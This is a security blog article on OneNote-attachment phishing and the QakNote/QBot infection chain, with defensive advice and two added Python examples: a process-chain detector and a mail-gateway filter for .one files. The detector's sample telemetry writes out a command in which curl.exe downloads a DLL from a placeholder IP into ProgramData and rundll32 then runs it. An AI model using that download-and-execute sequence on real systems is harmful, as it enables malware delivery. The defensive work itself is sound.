March 21, 2023 By Doug Bonderud 4 min read

There are plenty of phish in the digital sea, and attackers are constantly looking for new bait that helps them bypass security perimeters and land in user inboxes.

Their newest hook? OneNote documents. First noticed in December 2022, this phishing framework has seen success in fooling multiple antivirus (AV) tools by using .one file extensions, and January 2023 saw an attack uptick as compromises continued.

While this novel notes approach will eventually be phased out as phishing defenses catch up, current conditions make it worthwhile to understand how this attack works, what it means for organizations and what they can do to stay safe.

From many to .One — the impact of macro-economics

In July 2022, Microsoft disabled macros by default in all Office document types. Despite a temporary rollback in response to user concerns, auto-blocking of macros is now standard operating practice. While users can enable them after the fact, malicious actors can no longer rely on macros to make their phishing efforts easier.

To get around this change, attackers went looking for a new approach and found it in OneNote documents. For cyber criminals, the benefits of OneNote are two-fold. The first is novelty: businesses aren’t expecting attacks in .one files. The second is efficacy: as noted by ZDNET, multiple AV tools did not flag OneNote attachments as malicious, even when they contained malware payloads.

How OneNote malware works

The first OneNote attacks were discovered in December 2022 as attackers experimented with new phishing methods. As of February 2023, more than 60 attacks were confirmed on companies in the manufacturing, industrial and education sectors.

Common payloads attached to malicious documents include AsyncRAT, AgentTesla, Doubleback and Redline. Malicious actors also created a mix of specific and general compromise campaigns. In the case of industrial and manufacturing firms, attachments appeared to be documents containing details about machine parts or specifications. Educational institutions were on the receiving end of more widespread campaigns that included fictitious invoices or offers of Christmas bonuses.

Despite the new file format, OneNote phishing attacks play out much like their more familiar counterparts. Victims must open the email message, open the attachment and then click through the malicious links. While OneNote does warn users about the risk of suspicious document links, this doesn’t always have the intended effect. Consider that 45% of all alerts are false positives and that one-third of IoT security staff ignore alerts if their queue is already full. Given that even security professionals don’t always investigate potential problems because they’re too busy or because perceived threats may simply be common errors, it’s hardly surprising that front-line staff feel confident clicking through to OneNote documents despite system warnings.

Once inside a company’s network, malicious payloads delivered by OneNote documents can find, collect and exfiltrate sensitive data, including usernames, passwords and protected files.

Duck, duck, lose

Efforts are also underway to expand the impact of OneNote attacks by bundling documents with the QBot malware payload. Originally a banking trojan discovered in 2007, QBot — also called QakBot — has evolved into an initial access framework. As part of a phishing campaign, it takes on the task of gaining initial device access, in turn enabling attackers to load and execute additional malware payloads.

As noted by SC Magazine, a cyber crime group known as TA577 has leveraged QBot-based attacks to gain system access, then steal and sell collected data to other cyber criminals. Known as QakNote, this new attack approach has quickly gained ground. Since early February, attackers have pressed their advantage to hook as many phish as possible before the pond dries up.

In practice, QBot attacks start with an embedded HTML application (HTA) that retrieves QBot when users click on malicious links. Then, an HTA script uses the curl.exe application to download a DLL file that contains QBot. This file is placed in the C:\ProgramData folder and executed using Rundll32.exe. Finally, the payload injects itself into the Windows Assistive Technology file — AtBroker.exe — to conceal itself from security tools.
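The chain above leaves a recognisable trail in process-creation telemetry. The following is an added example (not code from the article or any vendor) that scores that trail: the event schema and sample events are constructed, mshta.exe is assumed as the HTA host, and the AtBroker.exe parent link is an assumption about how the injection target gets started.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line

# Constructed sample telemetry: OneNote -> HTA host -> curl.exe drop -> rundll32.exe -> AtBroker.exe
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(400, 300, r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE", "ONENOTE.EXE invoice.one"),
    ProcEvent(410, 400, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\bob\AppData\Local\Temp\open.hta"),
    ProcEvent(420, 410, r"C:\Windows\System32\curl.exe", r"curl.exe -o C:\ProgramData\update.dll http://203.0.113.10/update.dll"),
    ProcEvent(430, 410, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\ProgramData\update.dll,DllEntry"),
    ProcEvent(440, 430, r"C:\Windows\System32\AtBroker.exe", "AtBroker.exe"),
    ProcEvent(500, 300, r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),  # benign
]

def qaknote_findings(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event matching one stage of the chain."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        image, cmd = e.image.lower(), e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        parent_image = parent.image.lower() if parent else ""
        programdata_dll = "\\programdata\\" in cmd and ".dll" in cmd
        # Stage 1: the HTA host (mshta.exe, assumed) launching curl.exe or rundll32.exe
        if parent_image.endswith("\\mshta.exe") and image.endswith(("\\curl.exe", "\\rundll32.exe")):
            findings.append(("hta_spawns_lolbin", e.pid))
        # Stage 2: curl.exe writing a DLL into C:\ProgramData
        if image.endswith("\\curl.exe") and programdata_dll:
            findings.append(("curl_drops_dll_in_programdata", e.pid))
        # Stage 3: rundll32.exe loading a DLL from C:\ProgramData
        if image.endswith("\\rundll32.exe") and programdata_dll:
            findings.append(("rundll32_loads_programdata_dll", e.pid))
        # Stage 4: AtBroker.exe (the injection target) started by rundll32.exe; parent link assumed
        if image.endswith("\\atbroker.exe") and parent_image.endswith("\\rundll32.exe"):
            findings.append(("rundll32_spawns_atbroker", e.pid))
    return findings

def is_qaknote_chain(events: List[ProcEvent], min_stages: int = 3) -> bool:
    """Alert only when several distinct stages line up; a lone rundll32.exe is routine."""
    return len({rule for rule, _ in qaknote_findings(events)}) >= min_stages

if __name__ == "__main__":
    print(qaknote_findings(SAMPLE_EVENTS), is_qaknote_chain(SAMPLE_EVENTS))
```

Requiring several distinct stages keeps the benign rundll32.exe event from firing on its own while the full drop-and-execute sequence still alerts.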

Foiling the phish

Recognizing OneNote issues is the first step in reducing risk. But what else can companies do to limit the chance of compromise?

Thankfully, the novel nature of the note attack doesn’t change the overall security strategy. First, companies need to implement robust spam filters to keep the bulk of potentially problematic emails out of user inboxes. This approach works well because it doesn’t just emphasize detecting the malicious nature of OneNote documents. Rather, it focuses on identifying messages as spam, which is often a more straightforward task.
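Spam scoring can be complemented by a simple attachment policy at the mail gateway. The following is an added example (not code from the article) that holds inbound mail carrying a .one file, including one wrapped in a zip; the sample message is constructed and application/onenote is assumed as the MIME type.

```python
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from typing import List

ONENOTE_MIME = "application/onenote"  # OneNote MIME type (assumed here)

def onenote_attachments(raw: bytes) -> List[str]:
    """Return the names of OneNote attachments in a raw RFC 822 message,
    including .one files carried inside a zip attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits: List[str] = []
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        if name.endswith(".one") or part.get_content_type() == ONENOTE_MIME:
            hits.append(name or ONENOTE_MIME)
        elif name.endswith(".zip"):
            # Look one level into zip archives, a common wrapper for lure attachments.
            try:
                with zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))) as zf:
                    hits.extend(f"{name}:{n}" for n in zf.namelist() if n.lower().endswith(".one"))
            except zipfile.BadZipFile:
                pass  # corrupt or non-zip payload: leave it to the AV layer
    return hits

def should_quarantine(raw: bytes) -> bool:
    """Policy hook for the mail gateway: hold any inbound mail carrying a .one file."""
    return bool(onenote_attachments(raw))

def build_sample() -> bytes:
    """Constructed lure: a bare .one attachment plus a zip wrapping another one."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "accounts@example.net", "bob@example.com", "Invoice"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(b"constructed bytes", maintype="application",
                       subtype="octet-stream", filename="invoice.one")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("parts_spec.one", b"constructed bytes")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="specs.zip")
    return msg.as_bytes()

if __name__ == "__main__":
    print(onenote_attachments(build_sample()))
```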

Next is cybersecurity education that focuses on secure computing habits. While this includes reminders to heed security warnings, it’s also critical for companies to offer more proactive advice that helps staff spot phishing efforts more easily. As social engineering efforts become more in-depth, this education is shifting away from generic recommendations such as looking for grammar or spelling errors. Instead, it takes a more considered approach built around questions. Common questions for staff include: Why am I receiving this email? Do I know the sender? Was I asking for these documents? What action are they asking me to take? It’s also worth running regular phishing exercises to see whether staff can spot security risks before they click through.

Slow and steady

Lastly, enterprises need to prioritize the value of slowing down when it comes to improving security. This is because company culture often prioritizes speed. Staff want to meet deadlines and avoid setbacks on current projects, meaning that potential security threats may be sidelined in favor of keeping tasks on track. To address this, IT teams need to seek out C-suite support for policies that require staff to report potential problems and make it clear that this reporting takes priority over other tasks. It’s also worth implementing a system that allows staff to quickly flag emails for IT review.

Bottom line? Security teams need to take note and take action. The shift away from macro-based malware may have closed one digital door, but it opened a window for new phishing frameworks.
